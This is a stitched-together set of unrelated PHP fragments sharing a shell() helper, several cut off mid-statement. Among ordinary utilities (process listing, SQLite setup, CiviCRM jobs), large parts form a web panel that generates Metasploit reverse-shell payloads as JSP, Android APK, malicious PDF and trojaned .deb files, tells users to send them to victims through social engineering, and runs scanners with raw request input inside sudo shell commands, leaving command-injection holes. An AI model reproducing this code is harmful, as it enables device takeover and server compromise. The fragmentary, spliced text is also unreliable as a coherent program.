/**
 * List processes with `ps -eo <fields>` and return the data rows.
 *
 * $fields is wrapped with escapeshellarg(), so it reaches ps as a single
 * quoted argument and cannot add further shell commands. It still decides
 * which columns ps prints, so callers that accept it from a request should
 * restrict it to a known list of column names.
 *
 * stderr is merged into stdout (`2>&1`), so a ps error message ends up in the
 * returned rows rather than being reported separately.
 *
 * @param string $fields Column list handed to `ps -eo`.
 * @return array Output lines without the first (header) and the last one;
 *               the last one is presumably the empty string that follows the
 *               trailing newline - confirm against shell()'s return value.
 */
function ps($fields)
{
    $command = sprintf('ps -eo %s 2>&1', escapeshellarg($fields));
    $lines = preg_split('/\\R/', shell($command));

    // array_slice() re-indexes from 0, which is what appending row by row produced.
    return array_slice($lines, 1, -1);
}
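/**
 * Recreate the SQLite database named by the DB constant with empty `comics`
 * and `images` tables.
 *
 * Any existing database file is deleted first, so all stored data is lost.
 *
 * @return bool Always true.
 */
function create_tables()
{
    if (file_exists(DB)) {
        // Remove the old file through the filesystem API. Building an
        // `rm -f <path>` string and passing it to a shell breaks on paths
        // that contain spaces and lets shell metacharacters in the path be
        // interpreted as commands.
        unlink(DB);
    }

    $db = new SQLite3(DB);

    // Create both tables inside one transaction so the schema is all-or-nothing.
    $db->exec("BEGIN DEFERRED;");
    query('CREATE TABLE comics (id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT, pages INTEGER, zip_path TEXT, cover TEXT);', $db);
    query('CREATE TABLE images (id INTEGER PRIMARY KEY AUTOINCREMENT, comics_id INTEGER, page INTEGER, filepath TEXT);', $db);
    $db->exec("COMMIT;");

    return true;
}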
/**
 * Entry point of the contact delete / undelete job.
 *
 * Defines the ID_COLUMN, UNDELETE and TAG_ID constants, creates a job tag
 * stamped with the current date, and then hands the input file to withFile()
 * with 'processContacts' as the callback name.
 *
 * @param array $args Parsed options; reads 'id-col' and 'input-file' through
 *                    getOption() and the 'undelete' key directly.
 * @return void
 */
function trash_run($args)
{
    define('ID_COLUMN', getOption('id-col', $args));
    $input = getOption('input-file', $args);

    // Fixed command string, no caller data reaches the shell here.
    $jobDate = shell('date +"%F %R"');

    $undelete = $args['undelete'] ? TRUE : FALSE;
    define('UNDELETE', $undelete);

    $tagLabel = $undelete ? 'UNDelete CiviCRM Contacts' : 'Delete CiviCRM Contacts';
    $apiTag = createJobTag($jobDate, $tagLabel);
    define('TAG_ID', $apiTag->id);

    withFile($input, 'processContacts');
}
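/**
 * Snapshot the process table as a list of rows sorted by parent pid, then pid.
 *
 * Runs a fixed `ps -eo pid,ppid,pgid,comm,args` command (no caller input
 * reaches the shell) and parses every data line.
 *
 * The `comm` and `args` values are chosen by whoever started the process.
 * Treat them as untrusted text and escape them for the output context
 * (HTML, log line, ...) before displaying them.
 *
 * @return array List of arrays with the keys pid, ppid, pgid (int) and
 *               comm, args (string).
 */
function ps_query()
{
    $out = shell('ps -eo pid,ppid,pgid,comm,args');
    $ret = array();

    // Skip the header line and the last element of the split output.
    foreach (array_slice(preg_split('/\\R/', $out), 1, -1) as $line) {
        // A line that does not match leaves $m empty. Skip it, otherwise a
        // bogus row with pid 0 and null names would be appended.
        // NOTE(review): a command name containing spaces is split at the
        // first space, so `comm` can be truncated and the remainder shows up
        // at the start of `args`.
        if (!preg_match('/(\\d+)\\s+(\\d+)\\s+(\\d+)\\s+(\\S+)\\s+(.*)/', $line, $m)) {
            continue;
        }
        $ret[] = array(
            'pid' => intval($m[1]),
            'ppid' => intval($m[2]),
            'pgid' => intval($m[3]),
            'comm' => $m[4],
            'args' => $m[5],
        );
    }

    usort($ret, function ($a, $b) {
        $cmp = $a['ppid'] - $b['ppid'];
        if ($cmp == 0) {
            $cmp = $a['pid'] - $b['pid'];
        }
        return $cmp;
    });

    return $ret;
}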
# function shell($arr) { $n = count($arr); $h = 1; while ($h < $n / 3) { $h = $h * 3 + 1; } while ($h >= 1) { for ($i = 1; $i < $n; $i++) { for ($j = $i; $j >= $h; $j = $j - $h) { if ($arr[$j] < $arr[$j - $h]) { swap($arr, $j, $j - $h); } else { break; } } } $h = floor($h / 3); } return $arr; } function swap(&$arr, $i, $j) { $tmp = $arr[$i]; $arr[$i] = $arr[$j]; $arr[$j] = $tmp; } $arr = [1, 43, 54, 62, 21, 66, 32, 78, 36, 76, 39]; print_r(shell($arr));
exec("sudo zip exploits/{$pkg}.zip exploits/{$pkg}.jsp"); echo '<p><b>Payload Configuration</b></p>'; echo '****************************************************************************'; echo '<p><b>LHOST</b> -->' . $ip . '</p>'; echo '<p><b>LPORT</b> -->' . $port . '</p>'; echo '<p><b>PACKAGE NAME</b> -->' . $pkg . '.jsp</p>'; echo '<p><b>PAYLOAD</b> -->java/jsp_shell_reverse_tcp</p>'; echo '<p><b>AVAILABLE FOR DOWNLOAD @</b> --><a href=exploits/' . $pkg . '.zip>click here</a>'; echo '<p><b>AFFECTED SYSTEMS ARE</b> -->Websites(jsp)</p>'; echo '<p>*****************************************************************************</p>'; echo '<b>Note:</b> Upload this shell on website supporting JSP and start meterpreter listener '; echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>'; echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli exploit/multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST=' . $ip . ' LPORT=' . $port . ' E </b></code>'; break; case c16: shell("echo '[Wait] While i generate your {$pkg}.apk payload..........'"); exec("sudo msfpayload android/meterpreter/reverse_tcp LHOST={$ip} LPORT={$port} R >exploits/{$pkg}.apk"); exec("sudo chmod +x exploits/{$pkg}.apk"); echo '<p><b>Payload Configuration</b></p>'; echo '****************************************************************************'; echo '<p><b>LHOST</b> -->' . $ip . '</p>'; echo '<p><b>LPORT</b> -->' . $port . '</p>'; echo '<p><b>PACKAGE NAME</b> -->' . $pkg . '.apk</p>'; echo '<p><b>PAYLOAD</b> -->android/meterpreter/reverse_tcp</p>'; echo '<p><b>AVAILABLE FOR DOWNLOAD @</b> --><a href=exploits/' . $pkg . 
'.apk>Click here</a>'; echo '<p><b>AFFECTED SYSTEMS ARE</b> -->Android OS</p>'; echo '<p>*****************************************************************************</p>'; echo '<b>Note:</b>You can send this package to victim by any social engineering techniques '; echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>'; echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=' . $ip . ' LPORT=' . $port . ' E </b></code>'; break;
} else { echo '<p>Emplacement de téléportation introuvable</p>'; } } else { echo '<p>Joueur introuvable</p>'; } } else { echo "Erreur"; } break; case "motd": echo "\n\t\t\t\t<p class=\"title\">Modifier le MOTD</p>\n\t\t\t\t<p><form method=\"post\" action=\"index.php?module=shell&action=motd_v\">\n\t\t\t\t\tNouveau message du jour : <input type=\"text\" name=\"motd\"><br />\n\t\t\t\t\t<p>Attention : Eviter les accents</p>\n\t\t\t\t\t<center><input type=\"submit\" name=\"ok\" value=\"Envoyer\"></center>\n\t\t\t\t</form></p>"; break; case "motd_v": $motd = $_POST['motd']; $send = shell('server set motd ' . $motd); if ($send) { echo "<p>Le message du jour à été redéfini en " . $motd . ".</p>"; } else { echo "<p>Erreur lors de l'envoie</p>"; } break; case "ticket": echo "\n\t\t\t\t<p class=\"title\">Voir un ticket</p>\n\t\t\t\t<p>Remplir un des deux champs</p>\n\t\t\t\t<p><form method=\"post\" action=\"index.php?module=shell&action=ticket_v\">\n\t\t\t\t\tNom ou ID du personnage : <input type=\"text\" name=\"char\"><br />\n\t\t\t\t\tID du ticket : <input type=\"text\" name=\"ticket\">\n\t\t\t\t\t<center><input type=\"submit\" name=\"ok\" value=\"Voir\"></center>\n\t\t\t\t</form></p>"; break; case "ticket_v": if (isset($_POST['ok'])) { require "../kernel/config.php"; mysql_connect($characters[1]['host'], $characters[1]['user'], $characters[1]['password']) or die(mysql_error()); $char = mysql_real_escape_string($_POST['char']); $ticket = mysql_real_escape_string($_POST['ticket']);
die("Bad, very bad, this characters are not accepted: ; | & %"); } $str .= $value; } $url = trim($url); //remove space from start and end of url if (substr(strtolower($url), 0, 7) == "http://") { $url = substr($url, 7); } // remove http:// if included if (substr(strtolower($url), 0, 8) == "https://") { $url = substr($url, 8); } $url_parts = explode("/", $url); $url = $url_parts[0]; shell("sudo nmap {$str} {$url}"); echo '</div> <footer> <div align="left"> <h3>Thank You!</h3> </div> </footer> </article><!-- end of styles article --> <h4 class="alert_success">Scan Succeeded </h4> '; echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Nmap Done ! See result in result section'});</script>"; } } ?>
$ip = $_POST['ip']; $port = $_POST['port']; $pkg = $_POST['pkg']; $c = $_POST['c']; if ($ip == '' || $port == '') { echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered datas correctly...'});</script>"; } else { echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Generating Payloads, please wait... ! Please refer result section after this message'});</script>"; require_once 'loading.php'; exec("sudo rm -r exploits/ && sudo mkdir exploits && sudo chmod 777 -R exploits/"); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $pkg)) { echo "File is valid, and was successfully uploaded.\n" . "<br/>"; shell("echo '[Wait] While I generate your payload......'"); exec("sudo chmod 777 {$pkg}"); exec("sudo msfcli exploit/windows/fileformat/adobe_pdf_embedded_exe LHOST={$ip} LPORT={$port} INFILENAME=/var/www/lab/{$pkg} FILENAME=veer.pdf PAYLOAD={$c} E\n"); shell("sudo mv /root/.msf4/local/veer.pdf exploits/{$pkg}"); exec("sudo rm {$pkg} && sudo chmod 755 exploits/{$pkg}"); exec("sudo zip exploits/{$pkg}.zip exploits/{$pkg} "); echo '<p><b>Payload Configuration</b></p>'; echo '****************************************************************************'; echo '<p><b>LHOST</b> -->' . $ip . '</p>'; echo '<p><b>LPORT</b> -->' . $port . '</p>'; echo '<p><b>PACKAGE NAME</b> -->' . $pkg . '</p>'; echo '<p><b>PAYLOAD</b> -->' . $c . '</p>'; echo '<p><b>AVAILABLE FOR DOWNLOAD zip format @</b> --><a href=exploits/' . $pkg . 
'.zip>Click here</a>'; echo '<p><b>AFFECTED SYSTEMS ARE</b> --> Adobe Reader v8.x, v9.x (Windows OS)</p>'; echo '<p>*****************************************************************************</p>'; echo '<b>Note:</b>You can send this package to victim by any social engineering techniques '; echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>'; echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli exploit/multi/handler PAYLOAD=' . $c . ' LHOST=' . $ip . ' LPORT=' . $port . ' E <b></code>'; } else {
<?php require __DIR__ . '/../share/app.php'; $f = isset($_GET['f']) ? strval($_GET['f']) : __DIR__; if (isset($_GET['q']) && trim($_GET['q']) != '') { $out = shell(sprintf('locate %s', escapeshellarg(trim($_GET['q'])))); $fields = array(new TableFieldIcon(), new TableFieldLink('Name', 'path', function (FileModel $file) { return url(array('q' => false, 'f' => $file->path())); }), new TableField('Type', 'type'), new TableFieldFormat('Size', 'size', 'format_bytes'), new TableField('MIME', 'mime'), new TableField('Permissions', 'perms')); $rows = array(); foreach (explode("\n", $out) as $row) { if (!empty($row)) { $rows[] = new TableRow(new FileModel($row), $fields); } } $middle = render_str('foobar/table', compact('fields', 'rows')); } else { $file = new FileModel($f); if (is_dir($f)) { $fields = array(new TableFieldIcon(), new TableFieldLink('Name', 'basename', function (FileModel $file) { return url(array('q' => false, 'f' => $file->path())); }), new TableField('Type', 'type'), new TableFieldFormat('Size', 'size', 'format_bytes'), new TableField('MIME', 'mime'), new TableField('Owner', 'owner'), new TableField('Group', 'group'), new TableField('Permissions', 'perms')); $rows = $file->rows(); $middle = render_str('foobar/table', array('fields' => $fields, 'rows' => new TableRowGenerator($rows, $fields))); } else { switch ($file->mime()) { case 'audio/mpeg': if (begins($file->realpath(), $_SERVER['DOCUMENT_ROOT'])) { $middle = render_str('foobar/audio', array('src' => replace_prefix($file->realpath(), $_SERVER['DOCUMENT_ROOT'], '/'))); } else { $middle = render_str('foobar/audio', array('src' => 'image.php?' . http_build_query(array('f' => $file->realpath()))));
shell(" sslyze {$url}:{$port0} |sed -e '1,11d'"); } if (isset($c5)) { echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Checking if {$url} uses load balancing..See details in Result section'});</script>"; echo "<p><b>Checking if {$url} uses load balancing</b></p>"; shell("lbd {$url}|sed -e '1,3d'"); } if (isset($c6)) { echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Detecting firewall for {$url}..See details in Result section'});</script>"; echo "<p><b>Detecting firewall for {$url} :</b></p>"; shell("wafw00f {$url} |sed -e '1,13d'"); } if (isset($c7)) { echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Detecting Application @ {$port} on {$url}..See details in Result section'});</script>"; echo "<p><b>Detecting Application at port {$port} on {$url} :</b></p>"; shell("sudo amap -A {$url} {$port}|grep 'Protocol\\|Unidentified'"); } echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Scanning Done for {$url}..See details in Result section'});</script>"; echo '</div> <footer> <div align="left"> <h3>Thank You!</h3> </div> </footer> </article><!-- end of styles article --> <h4 class="alert_success">Scan Succeeded </h4> '; } else { echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : '!!!!You have not selected any option!!!!'});</script>";
$time = microtime(true); $f($x); return microtime(true) - $time; }); defun('tabulate', function ($h1, $h2, $arr) { return key_foldr(function ($str, $row) { list($n, $v) = $row; $v = is_array($v) ? implode(' ', $v) : $v; $s = format($v); return "{$str}\n{$n} {$s}"; }, "{$h1} " . (is_array($h2) ? implode(' ', $h2) : $h2), $arr); }); defun('shell', 'shell_exec'); defun('mem', function ($cmd) { $time = trim(substr(`whereis time`, 6)); return intval(shell("{$time} -f '%M' {$cmd} 2>&1 1> /dev/null")); }); defun('runphp', function ($f, $arg) { return "./runphp '{$f}({$arg})'"; }); function papply() { $args = func_get_args(); $f = op(array_shift($args)); return function () use($args, $f) { static $curried = true; return call_user_func_array('call_user_func', array_merge($args, func_get_args())); }; } defun('parens', function ($x) { return "({$x})";
var yPos = row; $(root).find('.cell[pos=p-' + xPos1 + '-' + yPos + ']').removeClass('on').addClass(cssClass); $(root).find('.cell[pos=p-' + xPos2 + '-' + yPos + ']').removeClass('on').addClass(cssClass); } } } $(document).ready(function() { function spawn() { $('.invader').each(function() { render(this, dna()); }); } spawn(); setInterval(spawn, 1000); }); </script> <?php for ($i = 0; $i < 300; $i++) { ?> <?php echo shell(); ?> <?php } ?> </body> </html>
/**
 * Run `tsp -i` for one job and return what shell() returns for it.
 *
 * The job id is quoted with escapeshellarg(), so it is passed to tsp as a
 * single argument. stderr is folded into stdout (`2>&1`), so an error from
 * tsp is part of the returned text.
 *
 * @param string|int $job_id Job identifier.
 * @return mixed Result of shell(), which is defined elsewhere.
 */
function ts_info($job_id)
{
    $quotedId = escapeshellarg($job_id);
    $command = sprintf('tsp -i %s 2>&1', $quotedId);

    return shell($command);
}
if ($ip == '' || $port == '') { echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered datas correctly...'});</script>"; } else { echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Generating Payloads, please wait... ! Please refer result section after this message'});</script>"; require_once 'loading.php'; echo "<fieldset>"; switch ($p) { case p1: $sh = "freesweep.sh"; $pkg = "freesweep.deb"; shell("sudo sh cmd/debian/{$sh} {$c} {$ip} {$port} {$uname}"); break; case p2: $sh = "xbomb.sh"; $pkg = "xbomb.deb"; shell("sudo sh cmd/debian/{$sh} {$c} {$ip} {$port} {$uname}"); break; } echo '<p><b>Payload Configuration</b></p>'; echo '****************************************************************************'; echo '<p><b>LHOST</b> -->' . $ip . '</p>'; echo '<p><b>LPORT</b> -->' . $port . '</p>'; echo '<p><b>PACKAGE NAME</b> -->' . $pkg . '</p>'; echo '<p><b>PAYLOAD</b> -->' . $c . '</p>'; echo '<p><b>AVAILABLE FOR DOWNLOAD @</b> --><a href=exploits/' . $pkg . '>Click here</a>'; echo '<p><b>AFFECTED SYSTEMS ARE</b> -->Debian Based Linux Distributions</p>'; echo '<p>*****************************************************************************</p>'; echo '<b>Note:</b>You can send this package to victim by any social engineering techniques '; echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>'; echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b> sudo msfcli exploit/multi/handler PAYLOAD=' . $c . ' LHOST=' . $ip . ' LPORT=' . $port . ' E </b></code>'; $host = $_SERVER['SERVER_ADDR'];
/**
 * Print the contents of a file as an HTML <textarea>; when the file cannot be
 * read, search for files with the same base name using `locate` and try those.
 *
 * Reviewer note: this helper reads arbitrary paths on the host and shells out
 * to `locate`. In a web-facing script that combination is typical of a file
 * disclosure tool, so its presence on a server should be investigated.
 *
 * @param string $ruta Path of the file to show.
 * @param mixed  $loc  Truthy (and not the literal string "''") to allow the
 *                     `locate` fallback; the recursive calls pass false.
 * @return void Output is echoed.
 */
function mostrararchivo($ruta, $loc = true)
{
    // Newline-delimited list of paths already handled, kept across calls.
    static $leidos;
    // If there is a special function that bypasses open_basedir, it has to go here
    $ruta = realpath($ruta);
    // Only files below 50000 bytes are shown.
    if (filesize($ruta) < 50000) {
        // NOTE(review): `== false` also matches a hit at offset 0, which is
        // where the first recorded path is stored, so that path is not
        // treated as already read.
        if (strpos($leidos, "\n" . $ruta . "\n") == false) {
            $leidos .= "\n" . $ruta . "\n";
            // leerarchivo() is defined elsewhere; presumably it returns the file contents - confirm.
            $contenido = htmlentities(leerarchivo(ltrim($ruta)), ENT_QUOTES, 'UTF-8');
            if ($contenido) {
                // The textarea height follows the line count, capped at 15 rows.
                $lineas = substr_count($contenido, "\n");
                if ($lineas > 15) {
                    $lineas = 15;
                }
                echo '<div class="s">' . htmlentities($ruta, ENT_QUOTES, 'UTF-8') . ':</div><textarea style="width:100%;" rows="' . $lineas . '">' . $contenido . '</textarea><br><br>';
            } elseif ($loc and $loc != "''") {
                // use locate to find more files with that name
                // NOTE(review): this echo prints the path without htmlentities(), unlike the other outputs.
                echo $ruta . "<br>";
                // The base name is quoted with escapeshellarg(); the meaning of
                // the second argument of shell() is not visible here.
                $locate = shell("locate " . escapeshellarg(basename($ruta)), false);
                $locate = explode("\n", $locate);
                if ($locate) {
                    foreach ($locate as $ubicacion) {
                        // false disables a further locate search for the results.
                        mostrararchivo($ubicacion, false);
                    }
                }
            }
        }
    } else {
        echo '<div class="n" style="text-decoration: underline;">No se puede leer ' . htmlentities($ruta, ENT_QUOTES, 'UTF-8') . ' porque supera los 50000 bytes</div><br>';
    }
}
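<?php
// Form handler that runs BlindElephant.py against a submitted URL.
//
// The request fields `url` and `c` are untrusted. Each one is passed to the
// shell as a single escapeshellarg()-quoted argument, values that start with
// '-' are refused so they cannot be read as command-line options, and the URL
// is JSON-encoded before it is placed inside inline JavaScript.
if (isset($_POST['submit'])) {
    $url = (isset($_POST['url']) && is_string($_POST['url'])) ? trim($_POST['url']) : '';
    $c = (isset($_POST['c']) && is_string($_POST['c'])) ? trim($_POST['c']) : '';
    // The checkbox only counts when it was actually submitted.
    $guess = isset($_POST['check']);

    // Escapes <, >, &, ' and " so the value cannot close the JS string or the <script> element.
    $jsFlags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP;

    if ($url == '') {
        echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>";
    } elseif ($url[0] === '-' || ($c !== '' && $c[0] === '-')) {
        echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Invalid URL or application name.'});</script>";
    } else {
        $startMessage = json_encode("BlindElephant scan for {$url} ! Please refer result section after this message", $jsFlags);
        if ($startMessage === false) {
            // json_encode() fails on invalid UTF-8; fall back to an empty JS string.
            $startMessage = "''";
        }
        echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : " . $startMessage . "});</script>";
        require_once 'loading.php';

        if ($guess) {
            echo "<p><b>Guessing the name of CMS</b></p>";
            shell('BlindElephant.py ' . escapeshellarg($url) . ' guess');
        } else {
            $command = 'BlindElephant.py ' . escapeshellarg($url);
            if ($c !== '') {
                $command .= ' ' . escapeshellarg($c);
            }
            shell($command);
        }

        echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'BlindElephant Scan ! See Full result in result section'});</script>";
        echo '</div> <footer> <div align="left"> <h3>Thank You!</h3> </div> </footer> </article><!-- end of styles article --> <h4 class="alert_success">Scan Succeeded </h4> ';
    }
}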
} } for ($i = 0, $max = count($FILES); $i < $max; $i++) { $FILE = $FILES[$i]; if (isset($time)) { if ($filter === 2) { if (filemtime("scans/thumb/{$FILE}") < $time) { continue; } } else { if ($filter === 1) { if (filemtime("scans/thumb/{$FILE}") > $time) { continue; } } else { if ($filter === 3) { if (!(filemtime("scans/thumb/{$FILE}") > $time[1] && filemtime("scans/thumb/{$FILE}") < $time[0])) { continue; } } } } } $FILE = substr($FILE, 7, -3); $FILE = substr(exe("cd 'scans/file'; ls " . shell("Scan{$FILE}") . '*', true), 5, -1); //Should only have one file listed $IMAGE = $FILES[$i]; echo '<div class="box" id="' . html($FILE) . '">' . '<h2 ondblclick="toggleFile(this);" class="excluded">' . html($FILE) . '</h2><p><span>' . genIconLinks(null, "Scan_{$FILE}", false) . '</span><br/>' . '<a class="tool" target="_blank" href="scans/file/Scan_' . url($FILE) . '" style="width:100%;"><img src="scans/thumb/' . url($IMAGE) . '" alt="' . html($FILE) . '" style="width:100%"/><span class="tip">View raw file</span></a>' . '</p></div>'; } echo '</div><script type="text/javascript">' . 'if(typeof document.body.style.MozColumnGap=="string")' . 'getID("scans").className="columns";' . 'else ' . 'enableColumns("scans",null,' . (isset($_COOKIE["columns"]) ? 'true' : 'false') . ');</script>'; }
$url = substr($url, 7); } // remove http:// if included if (substr(strtolower($url), 0, 8) == "https://") { $url = substr($url, 8); } // remove http:// if included if (substr(strtolower($url), 0, 4) == "www.") { $url = substr($url, 4); } //remove www from domain $url_parts = explode("/", $url); $url = $url_parts[0]; echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : ' investigating IP Addresses and URLs with the common web based tools'});</script>"; shell("echo 'Investigating IP Addresses and URLs with common web based tools' "); shell("sudo automater -t {$url}|sed -e'1,13d'"); } echo '</div> <footer> <div align="left"> <h3>Thank You!</h3> </div> </footer> </article><!-- end of styles article --> <h4 class="alert_success">Scan Succeeded </h4> '; } else { echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : '!!!!You have not selected any option!!!!'});</script>"; die("!!!!You Have Not Selected any option!!!!");
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>"; } else { if (isset($c0)) { require_once 'loading.php'; switch ($c0) { case c1: echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content :'starting ping-sweep using nmap'});</script>"; echo "<p><b>Discovering which hosts are up within a range of IP addresses {$url}:</b></p>"; shell("echo 'Wait.........'"); shell(" sudo nmap -sP -T Insane {$url}|sed -e '1,2d'"); break; case c2: echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content :'Scanning Network {$url} for NetBIOS Name.Refer Result Section for details'});</script>"; echo "<p><b>Scanning Network {$url} for NetBIOS Name</b></p>"; shell("cho 'Wait........'"); shell("sudo nbtscan -r {$url}"); break; } echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content :'Scanning Done '});</script>"; echo '</div> <footer> <div align="left"> <h3>Thank You!</h3> </div> </footer> </article><!-- end of styles article --> <h4 class="alert_success">Scan Succeeded </h4> '; }
/**
 * Run `pstree -a` for one process id and return what shell() returns for it.
 *
 * The pid is quoted with escapeshellarg() before it is placed in the command
 * line. stderr is merged into stdout (`2>&1`). The output contains command
 * lines of other processes, so escape it before rendering it as HTML.
 *
 * @param string|int $pid Process id passed to pstree.
 * @return mixed Result of shell(), which is defined elsewhere.
 */
function shell_pstree($pid)
{
    $quotedPid = escapeshellarg($pid);
    $command = sprintf('pstree -a %s 2>&1', $quotedPid);

    return shell($command);
}
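/**
 * Call the CiviCRM API: in-process through civicrm_api3() when that function
 * is loaded, otherwise through civicrm/bin/cli.php.
 * NOTE: requires core hack to add --json output option.
 * https://gist.github.com/ginkgomzd/b26a750b2fbd3ce25950
 *
 * On the command-line path every value is passed through escapeshellarg().
 * Entity, action and parameter values can come from imported data, and an
 * unquoted or double-quoted value would let the shell expand `$(...)`,
 * backticks or an embedded quote.
 *
 * @param string $entity API entity name.
 * @param string $action API action name.
 * @param array  $params API parameters as key => value.
 * @return mixed The civicrm_api3() result, null when the in-process call
 *               throws, or the json_decode()d output of cli.php.
 */
function cvCli($entity, $action, $params = array())
{
    if (function_exists("civicrm_api3")) {
        try {
            return civicrm_api3($entity, $action, $params);
        } catch (CiviCRM_API3_Exception $e) {
            echo $e->getMessage();
            return null;
        }
    }

    $cmdApi = CIVICRM_ROOT . '/bin/cli.php';

    $clParams = '';
    foreach ($params as $key => $value) {
        // Quote the whole `--key=value` token so it reaches cli.php as exactly one argument.
        $clParams .= ' ' . escapeshellarg("--{$key}={$value}");
    }

    $call = 'php ' . escapeshellarg($cmdApi)
        . ' -e ' . escapeshellarg($entity)
        . ' -a ' . escapeshellarg($action)
        . $clParams
        . ' --json';
    echo $call . "\n";

    $apiResult = json_decode(shell($call));
    return $apiResult;
}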
shell("sudo python ./harvester/theHarvester.py -d {$url} -l {$limit} -v -t -b {$c}"); } elseif (isset($c2) && isset($c3)) { shell(""); shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -n -t -b {$c}"); } elseif (isset($c1)) { shell(""); shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -v -b {$c}"); } elseif (isset($c2)) { shell(""); shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -n -b {$c}"); } elseif (isset($c3)) { shell(""); shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -t -b {$c}"); } else { shell(""); shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -b {$c}"); } } echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Info Harvesting Completed!You Can see Full result in result section'});</script>"; echo '</div> <footer> <div align="left"> <h3>Thank You!</h3> </div> </footer> </article><!-- end of styles article --> <h4 class="alert_success">Scan Succeeded </h4> '; }
if ($url == '') { echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>"; } else { if (isset($c)) { require_once 'loading.php'; switch ($c) { case c1: echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Getting HTTP Header!Please refer result section after this message'});</script>"; echo "<p><b>Getting HTTP Header on {$url}</b></p>"; shell("sudo curl -I {$url}"); echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'See HTTP Header details for {$url} in Result Section'});</script>"; break; case c2: echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Dumping all the links of {$url} in your web page!Please refer result section after this message'});</script>"; echo "<p><b>Dumping all the links of {$url} in your web page</b></p>"; shell(" lynx -dump {$url} "); echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Links dumped from {$url} to your result section'});</script>"; break; case c3: echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Checking link status on {$url} !Refer Result Section For Detail'});</script>"; require 'microLink.php'; echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Done!Please refer result section after this message'});</script>"; break; } } echo '</div> <footer> <div align="left"> <h3>Thank You!</h3> </div>
